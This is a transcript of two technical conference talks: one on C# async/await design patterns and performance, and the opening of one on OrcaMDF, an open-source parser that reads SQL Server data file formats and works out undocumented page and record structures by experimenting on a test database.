states, but that's all it is. It's an object with states, and you can hang continuations off it that get fired when it transitions to one of those states. So I'm using tcs as my factory to create one of these tasks, one of these promise objects. I'm going to sign up a button click event handler. OnClick is a delegate which says: as soon as it's fired, I'm going to unsubscribe from the button click handler, and then tcs.SetResult -- I'm going to transition the object from its not-yet-completed state into its completed state. Question. Why am I using TaskCompletionSource of object? I'll just say: and then of course I sign up to the button click handler, and then it returns tcs.Task. tcs.Task is a Task of object. My method was only supposed to return a Task. Why didn't I just use var tcs equals new TaskCompletionSource, the non-generic form? Answer: the non-generic form doesn't exist; there just didn't seem any point adding it to the framework. So we use the generic form, and that's fine, because Task of T inherits from Task. Anyway, write this code, run this code: it says ready, hit the button once, it says fire, hit it a second time, and it executes. This is a silly example, honestly, and it's not quite right because the button click at this stage has two handlers -- this one and this one -- which are both active, so I really wouldn't write this. The important thing I wanted to show you was only this routine. This is the core of every time you're going to turn event-based things into task-based things, and there are a heck of a lot of them. One example I had, in the demo I did in the previous talk, was a storyboard. I wanted to await until the storyboard had finished. When a storyboard finishes, it fires an event, but I want to await until something has finished, so I needed some way to turn the storyboard event into a task. I did it exactly using this style. Let me give you another example. I had a bitmap image. You know how in WPF or Windows 8, when you create a new bitmap image from the source of a URI, it loads it lazily, it loads it asynchronously. You've got the bitmap image, which says, I will come from this URL, but it does not yet load it from that URL until the bitmap image is put there in the XAML, on the form, for it to be displayed. I wanted to wait until the bitmap image had been loaded. The reason I wanted to do that is because its pixel width and pixel height properties are not valid until after it's been loaded. What if I wanted to base its position on the form on its pixel height? Then I really need to await. I used exactly the same thing. If you have a bitmap image, then it has events for successfully loaded and for failed to download properly. I needed to actually add two delegates -- an on-success one and an on-failed one -- and in the on-failed one, it invoked tcs.SetException with the exception. Anyway, this was a completely general mechanism for turning your legacy events into tasks so you can use the task asynchronous pattern. That's one other neat thing we can do. Let's suppose I wanted to be flashy. What if I want to just await this guy? Maybe I might not want to do this, but you can imagine doing await storyboard would be a very fluent way of writing it. There is a way to do it. TaskAwaiter. I'm going to create an extension method. GetAwaiter. Thank you. Once all of that is present -- as long as there is a method called GetAwaiter that can be invoked off the thing, either an extension or an instance method; I'll put that up so you can see it -- if we have that, then you can await the button directly. I have some stupid bookkeeping to do because, as I told you, it doesn't have the non-generic thing, so I just had to put it into the non-generic form.
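Put together, the event-to-task trick plus the GetAwaiter extension come out roughly like this -- a sketch for a WPF button, with the unsubscribe bookkeeping kept minimal:

    using System.Runtime.CompilerServices;
    using System.Threading.Tasks;
    using System.Windows;
    using System.Windows.Controls;

    public static class ButtonExtensions
    {
        // Turn the next Click event into a Task: the general event-to-task mechanism.
        public static Task WhenClicked(this Button button)
        {
            var tcs = new TaskCompletionSource<object>();
            RoutedEventHandler onClick = null;
            onClick = (s, e) =>
            {
                button.Click -= onClick;   // only complete for the next click
                tcs.SetResult(null);       // transition the promise to "completed"
            };
            button.Click += onClick;
            return tcs.Task;               // Task<object> is a Task, so this is fine
        }

        // With a GetAwaiter extension method in scope, "await button1;" compiles directly.
        public static TaskAwaiter GetAwaiter(this Button button)
        {
            return button.WhenClicked().GetAwaiter();
        }
    }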
Here we have a technique where you can make your own user-defined types awaitable. That was what I wanted to say about integrating it. I wanted to talk a bit about the code gen and the performance. Is any of this visible at the back? That's complete silence, so maybe it's not even audible at the back. I see a raised thumb. The user writes async Task FooAsync with the body inside it. There's a heck of a lot of stuff here, and I don't want you to pay attention to all of it, and the slides are available offline if you want to look in a week's time. That's when they'll be available. But I want to say that this gray stuff is what the compiler generates. First, the compiler generates a method with exactly the same signature that you had: Task FooAsync. What it does is create a new state machine object, blah, blah, blah, blah, and it returns builder -- the builder is an AsyncTaskMethodBuilder. That's exactly like the TaskCompletionSource that we saw earlier, in fact: it's a way of turning events into tasks. That's what we're doing, and it returns it. And the body of the method has been munged into this private void MoveNext. I just put it here: the transformed body goes here. Oh, and you can see it calling SetException and SetResult exactly like TaskCompletionSource. So, if you're looking at your profiler logs and you see, oh, God, this awful function MoveNext is stealing all of my CPU cycles, how do I get rid of it? Don't think that. MoveNext is just the function you yourself wrote. You can also see that there's overhead here. There really is. So don't write async methods gratuitously if something is not really async. Question: what is the overhead for invoking a method? Let's assume that it's got an empty method body. What is the overhead for merely invoking a method? Well, if it's an async method, the overhead is three times what it is for invoking a non-async method. It might seem a lot, but of course, as soon as you put a single statement in there, or three statements, it will be dwarfed by them. But that's the ballpark figure to keep in mind. What does it actually look like? Here I've written code which says Console.WriteLine of A, then it has an await, then Console.WriteLine of B. So, the code that the compiler generates has Console.WriteLine of A, then it calls GetAwaiter on the operand of the await. That's exactly the GetAwaiter thing that we saw before when we made the button awaitable. If the awaitable thing has already completed, then let's just get the result from it immediately: GetResult. The job of this is to return the result, or to throw any exceptions if there were exceptions from the awaitable thing. Then it nulls out this temp field. Well, we can't just null it out; we have to assign it, because it's a structure type, with the default value of that type. And the reason we null it out immediately is for garbage collection purposes, so there are no dangling references. This is what we call a hot path. If the awaitable thing had already finished, then it just zooms through here really quickly. But if the awaitable thing had not yet finished, it has to do extra work. It has to save the state of where it got to in the method. More assignments. And it calls this builder.AwaitUnsafeOnCompleted. God, this function is so difficult to understand. I don't know. I'm not even going to try. All I want to say is that it calls into the await object in some way, and it passes it a delegate. And later on, when the await object is finished, it invokes that delegate, and that delegate causes execution to resume right here.
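Spelled out by hand, the shape of that expansion is roughly this -- schematic only; the real state machine also saves locals and its position in the method:

    using System;
    using System.Threading.Tasks;

    static class AwaitExpansionSketch
    {
        // A hand-written approximation of what  Console.WriteLine("A"); await t;
        // Console.WriteLine("B");  turns into.
        public static Task RunLikeGeneratedCode(Task t)
        {
            Console.WriteLine("A");
            var awaiter = t.GetAwaiter();
            if (awaiter.IsCompleted)
            {
                awaiter.GetResult();         // hot path: rethrows exceptions if there were any
                Console.WriteLine("B");
                return Task.FromResult(true);
            }

            // Slow path: register a continuation that resumes "after the await".
            var tcs = new TaskCompletionSource<bool>();
            awaiter.OnCompleted(() =>
            {
                try
                {
                    awaiter.GetResult();
                    Console.WriteLine("B");
                    tcs.SetResult(true);
                }
                catch (Exception ex) { tcs.SetException(ex); }
            });
            return tcs.Task;
        }
    }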
Well, what I wanted you to take away from this is that if you can get through the hot path quickly, your perf will improve dramatically. Let's talk a bit more about code gen. Here I've got int x equals 10, await t1, int z equals 10, and then inside I've got a nested scope that says int y equals 15. What's it going to do for this? Well, it's going to create the state machine class, and all variables that were in scope at the same level as the await will be lifted into the state machine. All variables that are in a scope that has no awaits will be left local. Actually, that's the statement for C#. For VB, it just lifts everything into the state machine. That's because of some design reasons in the VB language. What this means is that if your method accesses local variables like x or z, the compiler will transform them into field accesses. Field accesses are substantially slower than local variable accesses. My rule of thumb was about five times slower. If you're going to combine an await statement with some CPU bound work down here, watch out for this. Maybe factor the CPU bound work out into a separate method. I was going to look at the actual IL that gets generated in subtle cases, but it's a bit over the top. Let's review things first. Performance. Measure perf; figure out where the bottlenecks are. We see people thinking, oh, I've got to micro-optimize my async code, but what they don't realize is that 95% of the time is being spent waiting for the network. If you're doing that, there's really no point putting any effort into the CPU bound stuff. Really, look at your code with a kind of network big-O notation first. If you're doing two network loads sequentially, but you could do them in parallel with Task.WhenAll, that's where you'll get your bigger performance wins than micro-optimizing. Performance. It's very clear that when we're writing a client application -- WinForms, WPF, phone, desktop -- we're optimizing for responsiveness. But when we're writing server applications for ASP.NET or Azure, we're optimizing for throughput. Here, we did some experiments. We made a server. This server makes a query to a back-end service to get an RSS feed. It parses it, and it returns a page with the feed's title. We could implement this in an async way with an async download feed, or we could implement it synchronously with a synchronous download feed -- which is better? You know, if you just think about it, it's not clear, because the synchronous case has the extra overhead of tying up an entire thread, but the asynchronous case has the overhead of creating that asynchronous state machine, and the little overhead I talked about earlier. Also, they go through different code paths in the .NET framework. The async download thing is a different code path from the sync download thing, and up until this release, the async code path was a bit rusty. It hadn't been optimized as hard as it should. In the old days of ASP.NET, you had a thread pool of 20 threads, which means that if you tied up a thread for too long, bang, all of the threads were exhausted and you couldn't handle any more requests. In the modern day of ASP.NET, you have the full thread pool available, and it goes quite well if you tweak the settings -- say, if you raise the max thread pool up to 1,000 threads, then it can deal with as many threads as it will realistically be able to handle. In our experiments, we did get a bit better perf with async.
You can see it just being able to handle a few more requests per second. And actually, all commercial web servers and things like Node.js have also moved to async, just because it has the potential to be more efficient, whether or not we've reached that dream yet with the current .NET. Question: if we are using synchronous ASP.NET, does the thread pool ramp up quickly enough? That was another experiment. We start with no requests per second, and then we zoom it up to 750 requests per second. I picked that number because I happen to know, after I'd tweaked ASP.NET's thread pool, that once it built up enough threads, it could handle that rate pretty well. But look at this. The thread pool's hill-climbing algorithm ramps up pretty slowly. Five minutes, and it still hadn't responded to the burst in traffic. Async responds immediately, of course. That's one of the reasons why async is handy. So, I've just stressed: measure perf first, and only if perf is a problem, then try ideas. Here's one idea. Async Task F: return await LoadAsync. If I look at a method and all it has is return await, I'm a bit suspicious. Because remember, the whole point of the async modifier is that it wraps up the return operand into a task. And the whole point of the await keyword is that it takes a task and unwraps it. So this code could more simply be written without an async method. That's good. And we can use this trick in some useful places. Here, I'm going back to the async enumerator. Well, my original code used to enter the async method in all cases, but if I already had data, I'd just return it immediately. By checking first, and only doing the await if I didn't have data, I can make it into two separate methods for performance. If the data is already available, then return Task.FromResult of the thing. Task.FromResult will create a task much more efficiently than the whole async machinery. Indeed, in the simple cases -- 0, 1, 2, 3, true, false, empty string -- Task.FromResult just returns a pre-allocated result, so it doesn't even have any heap allocation. Only if the hot path was not available do I fall into the slow path. So really, I can hand-optimize the hot path. What I told you about the lifting of variables is that if I've got an await and CPU-bound work in the same method -- here, buf is used in the await and also inside the CPU-bound work -- I should factor that out into a separate method in my ASP.NET app to improve throughput. Finally, if you don't need to return to the UI thread -- remember, after an await, it always returns back to the calling synchronization context. If we're inside a library routine and we don't need that, like "while we've still got more stuff, await LoadMoreAsync", I could have just done .ConfigureAwait(false). That tells it: don't bother returning back to the UI context or wherever you were; just continue with this method wherever you happen to be. That will be quite a lot quicker. The UI thread is very slow to return to, comparatively. I mean, fast by UI standards, but slow by internal computation standards. Those are the performance and optimization things I've got. By the way, for you guys from Redgate, there was one slide that I put in. Oh, yeah, this shows what IL is generated in the more complicated cases. I didn't talk about that at all. And I'm not going to. That's everything I wanted to say. I've given you an idea of the design patterns that we've learned over the past two years. This is just a start.
The first of those years was spent furiously fixing bugs, trying to teach other people about async, just getting the feature working in the first place. So we haven't had that much of a runway to develop the best practices. And actually, what I'm really hoping is that it will be you guys who come and figure out the best practices and write blog posts, and then we'll look at what you've written and develop it. I've also shown you the mixing techniques: how to mix async into your legacy code, into event handlers, and how to put a synchronous wait inside a nested message loop. And with these hints about performance and code gen, I think you have the opportunity to create responsive client apps, or high-throughput Azure or ASP.NET apps. Thank you very much. Thank you.
|
The new Async language feature is easy enough to use in common scenarios. But as the software architect or expert in your team, you’ll want to know more -- what are the best design practices? where are the hidden performance bottlenecks? how can you make your own code blend seamlessly with the new ‘await’ keyword? how does it actually work under the hood? how can you stretch it in powerful ways? You’ll leave this talk an expert on async.
|
10.5446/50983 (DOI)
|
I'm kind of excited to see what you will get from this. So once you start drifting off and just falling over, that's the point where I'm going to pick it up and go a bit harder. So I usually give the warning at the beginning that this session is not meant to teach. It's meant to inspire you. You're not meant to learn all of what I'm saying here today. You're just meant to pick up a bit of it and get an idea of what's happening. So don't fret if there's something you don't understand. I'm going to be up here afterwards. Just enjoy the show. And you've been warned. So no complaints afterwards. This is where I usually start spending 10 minutes about who I am. Suffice to say, I'm the tech lead of a small company in Denmark. And I have no fancy titles. I'm not an MVP. I'm not an MCM. I'm nobody. So why am I here? About a year ago, I started an open source project just as a hobby. And today, it's ended up as a standalone parser for SQL Server data files, written in C#, with a payload of about 256 kilobytes. And it'll parse about 98% of the AdventureWorks database that ships with SQL Server 2008 R2. And it's open source. So you can get the source. You can use it. It's completely open. I want to show a quick example of how we used to query SQL Server. We would create a SQL connection, a command, the reader, and then loop over all of the rows. Very simple. Now with OrcaMDF, it's kind of different. You just instantiate the database. You give it the paths of the database files. If you have multiple, just put them in any order; OrcaMDF will parse them and find out which is which. You create a data scanner. And you tell it to scan the Persons table. And then you can print out the rows if you want. Those are standard data rows. You can just loop them. You can also do predicates. So you can say where the field Age, which is of type short, is less than 40. So it has full LINQ support. So you can just query it. It can also scan indexes. You just create an index scanner. And you can scan the CXPersonAID index on the Persons table. And once again, you just get standard data rows with index data in them. And you can even query DMVs, dynamic management views, which contain a lot of metadata in SQL Server. And those are a bit interesting, because they're not persisted to disk. So they're actually simulated live. And I'll show you later on how it works. And I have a quick demo. I'm not going to show you the code actually running, because there's quite a lot of it. But I also created a small GUI for it, since there were only two downloads on GitHub. So I wanted somebody to be able to try this besides me. I've got a standard AdventureWorks database. And just to show that SQL Server is not running, I rename it. I can do it. It's not locked. It's a normal file. And I can open it up. And OrcaMDF Studio will find it, show me all the tables. And I can do a select from the product table. And I've got the product data. I can sort it. I can query it. I can set filters on it. And it just gives me the data. I can also go and query the DMVs. So if we want to see all the tables, I can just query it. Or if we want to go a level deeper, we can look at the base tables that SQL Server uses, with the actual internal metadata that OrcaMDF parses. So you can download OrcaMDF Studio. It works today. It's completely open source. And it uses OrcaMDF under the hood.
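A rough reconstruction of the usage just described -- treat the class and method names as approximate; the real API is in the OrcaMDF source on GitHub:

    using System;
    using System.Linq;
    // namespaces roughly as in the OrcaMDF repository

    class Demo
    {
        static void Main()
        {
            // Point it at the data file(s); OrcaMDF works out which is which.
            var db = new Database(new[] { @"C:\Data\AdventureWorks.mdf" });
            var scanner = new DataScanner(db);

            // Scan a table and filter it with ordinary LINQ, as in the demo.
            var youngPeople = scanner.ScanTable("Persons")
                                     .Where(row => row.Field<short>("Age") < 40);

            foreach (var row in youngPeople)
                Console.WriteLine(row.Field<short>("Age"));
        }
    }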
So in SQL Server, we have a number of data files. Just to keep it simple, a database is a single file. And the file is just one big array of these eight kilobyte chunks, known as pages. And each of these pages has a 96 byte header and an 8,096 byte body. And everything in SQL Server is stored in this page format. So everything -- metadata, your indexes, your data, whatever you have -- everything is stored on these pages. At the end of the body of the page, we have what's known as the slot array. And the slot array defines the logical order of the rows on the page. So if we read it backwards, we have row zero stored up here; we'll read the next one, and it just shows us where all of the rows are stored. They're not necessarily stored in physical order on the page. So we have to read the slot array to find out where the data for a given row is on the page. And the records that I just showed you -- a record is the same as a tuple. It's a row. It's the actual row of data that's stored on the data pages. These store the data, they store the indexes, they store the source code for your stored procedures, for your views. Everything is stored as records on pages in data files. And all of these records are stored in a format known as the FixedVar format. And I'll go a bit more in depth on this in just a moment. It's got a couple of status bytes that say a bit about what's stored in this record. Then there are two bytes that point to the null bitmap, which I'll also go into detail on in just a bit. Right after that pointer, we have all of the fixed-length data. So this is where your integers are stored, your char(10)s, all of your data types that have a fixed length; they're stored in this portion of the record. Then we've got the null bitmap. First, we've got a count of how many columns are covered by the null bitmap. And then we have the actual null bitmap. And I'll tell you what it is in just a bit. And finally, we have the variable length section of the record. So this is where all of your variable length data is stored. Those are your strings, your vardecimals, whatever we don't know the size of up front. So the first status byte has eight bits, naturally. It's got a single bit that tells the version. This is always zero in SQL Server 2008 plus. We've got the record type. Is this a data record? Is it an index record? It's got three bits to tell what kind of record it is. It might not have a null bitmap. And if it doesn't, it will tell us that there isn't a null bitmap in this record. It also might not have any variable length columns. And in that case, it'll also tell us that you shouldn't expect there to be a variable length data section. Finally, SQL Server might add some versioning information. So if you're using snapshot isolation and it stores an earlier version in tempdb, it adds this 14 byte structure to the record. And this bit will be set in that case. And finally, we have a single unused bit. Which is kind of weird when you're looking at the next status byte, because only one bit is used. So why wouldn't they just compress that into one byte? I haven't gotten an answer from them. But most likely, it is for adding features in the future. If they ever wanted to expand this with just one extra bit of information, they would have to expand every row in your database with one byte. And that would cause fragmentation all over the place and basically be impossible for them. By wasting one byte per row, they retain the possibility of adding features later on.
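In code, pulling the individual flags out of status byte A looks roughly like this -- a sketch using the bit layout just described, not OrcaMDF's actual code:

    // Decode status byte A of a FixedVar record, per the layout described above.
    static void DescribeStatusByteA(byte statusA)
    {
        int  version           = statusA & 0x01;         // bit 0: always 0 on SQL Server 2008+
        int  recordType        = (statusA >> 1) & 0x07;  // bits 1-3: data record, index record, and so on
        bool hasNullBitmap     = (statusA & 0x10) != 0;  // bit 4
        bool hasVariableLength = (statusA & 0x20) != 0;  // bit 5
        bool hasVersioningInfo = (statusA & 0x40) != 0;  // bit 6: the 14-byte versioning tag is present
        // bit 7 is the unused bit discussed above
        Console.WriteLine("version={0} type={1} nullBitmap={2} varLength={3} versioning={4}",
                          version, recordType, hasNullBitmap, hasVariableLength, hasVersioningInfo);
    }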
That explanation for the wasted byte is guesswork, by the way. There's a lot of guesswork today, because I don't work for Microsoft. I don't have the source code. I've played with a lot of it, and I have some guesstimates, but I might be lying to you. So be warned. So the null bitmap is some bytes that track whether the columns are null or not. Every column that you have in your record will have a bit in the null bitmap. And if that bit is set, it means the column has a null value. So if you have eight columns, we will use eight bits, a single byte. If you have nine columns, we're going to use nine bits, which will take up two bytes of space. So in that regard, you actually get some columns for free. You have to divide by eight, rounding up, to find out how many bytes are used to store the null bitmap. And the null bitmap is pretty much always present on data records. But there are a few exceptions where it's not present. And generally, you never care about this. But once you start parsing this stuff, you're going to run into all sorts of weird combinations, and you discover some funky stuff, and you'll have a field day looking through it. Also, the null bitmap will use one byte even if you have just one column. So we have seven bits that are not used. And you would guess that those would probably be set to zero, so "not null". But they're just garbage. When SQL Server creates this null bitmap, it just takes the bytes from memory somewhere, flips the bits it needs, and pushes it down to disk. So you might have some data that just doesn't make sense. The variable length offset array is the last part of the record. We've got the first 10 bytes, which is the fixed length data. Then we've got two bytes that tell us how many variable length data columns we have in this record. And then for each of these, we have a two byte pointer that tells us where the data for that column stops in the record. Because we know where the data starts -- right after those pointers -- and if we know where the data stops, we can find the data for that given column. So we can just find the actual length of the data for each of these variable length data columns in our record. We've got a small sample. This is a normal record. We've got a couple of status bytes. We've got the fixed length pointer, the null bitmap pointer. Since there's no fixed length data in this table -- we only have a varchar -- it starts right here. So we've got the null bitmap. We've got one variable length column. It ends at byte index 15. And if we look at this, we know it starts here, and it ends here. So these are our bytes, and they correspond to the value that's been inserted into the table. So this is a very simple example of how the variable length data section works. And this format is used in a lot of different places in SQL Server, so it's pretty important. And we'll be looking at a lot more of those. So one common misconception is that if you have null columns, the data won't take up space; but it will always be stored on the page if it's a fixed length column. So if you have 10 nullable integers and all of those are null, they will still take up 40 bytes in your record. Even if they're null, they will be stored on disk. For variable length data types, that is not the case. They will not be stored on disk, but they will retain that 2-byte pointer in the variable length offset array. So they will use the two bytes no matter what. And if you have even a single variable length data column, you will also use those two bytes to track how many variable length data columns you have in the record. So there's a lot of wasted space, even if these values are null.
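Pulling the earlier pieces together -- the null bitmap size and the variable-length end offsets -- a parser reads them roughly like this (a sketch, not OrcaMDF's actual code):

    // One bit per column, rounded up to whole bytes.
    static int NullBitmapBytes(int columnCount)
    {
        return (columnCount + 7) / 8;
    }

    // Two bytes: the number of variable-length columns, then a two-byte end offset per column.
    static ushort[] ReadVariableLengthEndOffsets(byte[] record, int varCountOffset)
    {
        ushort count = BitConverter.ToUInt16(record, varCountOffset);
        var ends = new ushort[count];
        for (int i = 0; i < count; i++)
            ends[i] = BitConverter.ToUInt16(record, varCountOffset + 2 + i * 2);
        return ends;   // column i's data runs from the previous end offset up to ends[i]
    }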
The one exception to fixed-length columns always taking up space is trailing columns. So if you have a new column that you're adding that is nullable, SQL Server will actually just see in the metadata that there's an integer at the very end, but there's no data on disk, so it must be null. And that is the only case where you can actually have a non-persisted, nullable fixed length data type. In 2012, you can do the same with default values. So if you add an integer that is not nullable, but has a default value, SQL Server will register that in metadata and actually not have to touch disk. So that can save some space. And more importantly, you can add this integer column to your terabyte database without blowing everything up. Otherwise, it would have to touch each of these records on disk. So in all versions prior to 2012, it will have to touch disk once you add a fixed length column to your table. So when I started parsing this, one of the first things I needed to parse was the header of those pages. Those 96 bytes -- I needed to parse those. The problem is there's absolutely no documentation out there. There are some great books written, but none of them touch the page header, outside of just saying these 96 bytes are the header. So I tweeted out, and Kimberly Tripp, one of the greatest SQL Server gurus, wrote me back: well, basically you can use time, patience, and this undocumented command called DBCC PAGE, which I'll show you in just a moment. So let me show you how I found out what the header format is. I've got this small tool that I wrote that just converts between different number systems. So I can write decimal, binary, or hex, whatever I want, and it'll just show me the different values. It's also open source. It's also on GitHub on my account. Very simple. So what I'll do is just create a normal database. This is just an empty database. I'll create a table and insert a couple of rows. It doesn't really matter what it is. We just need a table. And then I'll use another undocumented command called DBCC IND. What this does is tell us the page IDs of the pages that are used for this table. In this case, the one we're interested in is page 147, which is the data page for this table. And by using DBCC PAGE on page 147, we can see the actual bytes that are stored on disk for this page. We've got all of the bytes here. Most of them are zeros, given that there's almost nothing on the page. More importantly, what it shows us up here is the header. So it tells us that we've got three records on this page. And if we look at the header down here, the first 96 bytes, we can start looking for those values. We just saw there was a value of three. And is there a three? There's a three right there. So we've got a single value of three that we know about because DBCC PAGE tells us. And there's only one place in the header where the value of three is stored. So obviously, that must be it. So we've just found one of these fields. We've also got 8,057. And if we convert that, we should look for 79 1F. And we've got it right there. So we can start just looking at these values that DBCC PAGE tells us are stored and look at the bytes: where are they actually stored? Now, the problem is there's also a header version of one. And if we look at the bytes down there, we've got a one right there. We've got one right there. We've got one. There are lots of ones right here. There are two of them right there. So we don't really know which one of these is the one. Anyone have a suggestion?
So what I did was to find the actual file where it's stored. I'll just copy its path. And then I will shut down SQL Server. While doing that, I'll open a hex editor. Open the file itself. And we know that this is page 147. And we know that each page is 8,192 bytes long. So this is the offset in the file where the data is stored. So if I go to that offset in my hex editor, what we see are the actual bytes. And right now, we've got a lot of zeros right here. So let's just do this. And this is where DBAs start to cry when I show this. And you shouldn't do this. So I've just entered some mumbo jumbo into my database. I'm going to restart SQL Server. And I'll reconnect to my database. And if we do a select star from our table -- I've just corrupted our database. So SQL Server can't even read the table anymore, because it doesn't know what to do with the data. And once it does that, it disconnects you from the database. So I'll just reconnect to it. Now what's interesting is that DBCC PAGE will actually still parse whatever it can. It'll do a best-effort parsing. And if we look at it now, we can see that it points to the next page, which is page ID 13,330. And obviously, there's no such page. So it's got a weird value. We can also see that there are currently 30,806 rows on the page. And that would be equal to it having about a quarter of a byte per row, which doesn't make sense. But if we look at that 30,806, we should look for the hex values 56 78. And if we go around here, we see 56 78. And you can kind of guess how this goes on. You can just sit there and substitute these values, trying them out. And slowly but surely, you're going to lose your girlfriend. But you're going to get the header format down at some point. And fortunately, the format is the same, no matter the page type. So what you'll end up with once you do this is a file like this, which is the whole header just written in C#, with all of the fields, and then the byte indexes of all of the fields, and then finally just reading them in. So at this point, I've got the whole header format spec'd out. And you won't find this on Google except for these source files. So this is completely undocumented. But now you've got it. So that's one step down. But yes, I usually speak very fast. This is based on an eight hour pre-con, but shoot. Yes? And what about other programs that want to use that database using SQL Server APIs? Could you have affected those users? I couldn't in this case, given that I completely shut down SQL Server and just wrote into the file while it was completely offline. When do I get data back -- like when I've restarted SQL Server? When this database is active. Yes? And you use this program? Oh, if I use OrcaMDF. OrcaMDF is completely read-only. So you can't connect to a database that's live, given that SQL Server locks it. But if you do a Volume Shadow Copy of the file, you can read it through OrcaMDF. And there's no impact. Completely read-only at this point. But can it be truly online? Can data be put into it while you are reading? Data can be put into it. But the thing is, you can't read the data file itself while SQL Server is using it, because SQL Server locks it. But if you take a Volume Shadow Copy of it -- so basically a point-in-time snapshot of the file -- you can read that one. And the real file will still work. So it's just a point-in-time snapshot that you're reading off. Point-in-time snapshot? Yes. OK, so I didn't realize that. Exactly.
And I suppose that you are only able to read the MDF, but not the transaction log, right? Yes. So the database has MDF files, data files, and it has log files. I only read data files at this point. That answers part of your question, because in that case, if somebody's making changes, they'll be changing the live files, not the copy you're reading. Yeah. So I want to do log files, but I've got to get rid of the puny remains of my life before I start doing that. So at this point, I have to move on. But there's still a lot of data stored on the pages. So if you look at the different data types, we basically have two kinds. We have the fixed length types, and we have the variable length data types. They're just two different parts of the FixedVar record format. The fixed length types are bit, char, int, decimal, datetime. All of these always have the same length. The variable length data types are all of your string types. You also have the XML type in there, anything that has a variable length. And there's also this little bugger called sql_variant, which can be anything. And you generally don't want to use it, so I try to hide it away. If you're using it, shame on you. There's rarely a good reason for it. I'm not going to go into all of the data types. I do not have the time for it. But there's one of them that's quite interesting, vardecimal, which is a decimal stored in a compressed format where it only takes up as many bytes as it needs. So it's a fixed length data type that's been made into a variable length data type. When you define it, you define the scale and the precision. You define how many digits you want, and where the comma should be placed. So internally, the decimal is just stored as one big humongous value. It doesn't know anything about decimal commas. That nine just defines at what index the comma should be placed in this big humongous number. So we're storing 123456.789. And what SQL Server actually does is to store the digits in groups of three. And if you have a group of three, you need to represent the numbers from 0 through 999. And we can do that using 10 bits, which represent the numbers from 0 through 1,023. So we're basically wasting 24 extra values. But if you look at the different sizes they could have chosen -- do you want to do 10 bits for three digits? Do you want to do 14 bits for four digits? There's a bigger waste with those. And 10 is pretty much the most optimal size to have used. Obviously, I could care less about this. It was just a fun exercise to try and reason about why they chose that size specifically. So what SQL Server does is to store only the groups of digits that actually have values. And all of these zeros will just be truncated, because we don't need them. The metadata tells us you should expect there to be two more groups of zeros. And we just save those 20 bits by not having to store those extra numbers on disk. And I've got a very lengthy blog post on this, in case you're really bored someday. So looking at the variable length data types, we've got two kinds of those. We've got SLOBs and LOBs. LOBs are large objects. And SLOBs, I kid you not, are small large objects. Those are the official definitions of them. So SLOBs, those are varchar, nvarchar, and varbinary(x), x being from 1 to 8,000. If you want to have a larger value, you need to use the LOB types, like text, ntext, image -- those are the classic ones -- and you have the newer ones, the max types: varchar(max), nvarchar(max), and so forth. And let me just show you how they work.
I have got an empty database. I created a table with two varchar(8000) columns. And I will insert a single row in there, with two values, each of them having 3,000 characters. And did I do that? I think I did. So using DBCC IND, we've got a data page, page ID 148. And using DBCC PAGE, we can find the bytes. And seeing as you can all read this already, I'm just going to go quickly. We've got the status bytes, the fixed length pointer, two columns, none of them null. We've got two variable length columns. And these are the pointers that we want to look at. So C50B and 7D17, those are the pointers that point to the end of the data in the record. And if we try and convert some of those values: we've got C50B, that's 3,013, meaning we've got 13 bytes of overhead, then we've got 3,000 characters. So the data ends at 3,013. Looking at the other one, we've got 7D17: 6,013. So 3,013 plus 3,000 extra characters of data. Very simple. So let's try and insert a record with two 5,000-character columns. Now we've got the data page 161. If we take a look at it, we've got the exact same format. And we have got 9513. So 5,013: 13 bytes of overhead, 5,000 bytes of data. The other one is 8093. So that ends at byte index 37,805, even though the page is no longer than 8 kilobytes. So something is amiss. What I found out is that when we need to represent this number, we have got 16 bits. But we really only need 15 bits, because it can't be any more than 8,192, and 15 bits is plenty for that. So we've got a single bit to spare. And it seems that if you just flip that very last bit, you get a value of 5,037, which is much more sensible. It's still not the data we're looking for, but at least it's a valid value. So what they use that very last bit for is to indicate that this is not the data you're looking for. This is a complex column that is going to show you where the data is. And they use these for row overflow, which means in this case you've got two 5,000 character columns; they can't be stored on a single page. So one of those columns is pushed off to another page and a pointer is left behind. If you look at that pointer, DBCC PAGE will actually show you that pointer and the values in it. So I looked at it, and I saw it had an update sequence value which corresponded to the bytes in red. It had some pointers, which is the blue stuff. And then it had a timestamp with this value down here, which kind of corresponds to what's stored on disk. The only thing is that this is stored in little-endian, so the first bytes are the least significant ones. And we need those four zeros right here, but they are not stored on disk. And I used way too much time just trying to figure out what I was doing wrong, until I cried on Twitter. And Paul Randal, another excellent SQL Server guru -- he worked on the team back in the day -- said, well, they're just not stored on disk. And you'll run into a lot of these situations where there's just no clear answer; there are just some implementation details that you'll have to guess about, or be lucky that they'll answer you on Twitter or find somebody. But generally, you just have to guess.
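Going back to that flipped top bit for a moment, a parser treats those two-byte offsets roughly like this -- illustrative, not OrcaMDF's actual code:

    // Interpret one two-byte entry from the variable-length offset array.
    static void InterpretVariableLengthOffset(ushort rawOffset)
    {
        bool isComplexColumn = (rawOffset & 0x8000) != 0;  // top bit set: pointer, not plain in-row data
        int  endOffset       = rawOffset & 0x7FFF;         // e.g. 37,805 & 0x7FFF = 5,037
        Console.WriteLine(isComplexColumn
            ? "Complex column (e.g. a row-overflow pointer); entry value " + endOffset
            : "In-row data ending at byte index " + endOffset);
    }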
So anyway, I now knew the format of this pointer structure. Looking at the disk, we've got the ID of this complex column, which is 2. We've got a field, the level. I can match these up with what DBCC PAGE tells me is up there. We've got the timestamp as well. Interestingly enough, they've got a field called unused. I'm not sure whether it's used or not, but it's called unused. I don't know what it's for. More importantly, we've got the size of the data. We've got the page ID, the file ID, and the slot ID on that page. So using this pointer, we can find out where the data is. And if we then look up that slot, that record, where it's stored, we will find a record known as a blob fragment record. It's got a couple of status bytes that tell us what kind of record this is: a blob fragment record. A fixed length pointer that points to the very end of the record -- so all of the data is stored in this part, which is the fixed length block. And what's in here is a specific structure that stores a timestamp that matches what's in the pointer, so it can match the two up and check that they were written at the same time. We've got an ID that tells what kind of structure this is. And finally, we've got the data itself, which we can read. Once you row overflow, these will be put on pages known as text mix pages. And if you have multiple columns that are overflowing from the same table, they may be stored on the same overflow pages, provided there's space for it. So it's not going to allocate a complete 8 kilobyte page even if you only overflow, like, 2 kilobytes of data. It'll just push more of those in. So it will only push data off row if your data is larger than 24 bytes, given that the pointer itself is 24 bytes. It doesn't make sense to overflow anything smaller than that. Once it does so, it'll leave behind what's known as a blob inline root pointer, which is this 24 byte structure that I just showed you, and it'll push the data off to a blob fragment record on a text mix page. And one issue is that performance can be difficult to predict. You're inserting a record with 6,000 characters of data, and you expect it to be inserted in order -- you've got a previous page, new page, new page. What you don't know is that there's already a record on there with 4,000 bytes of 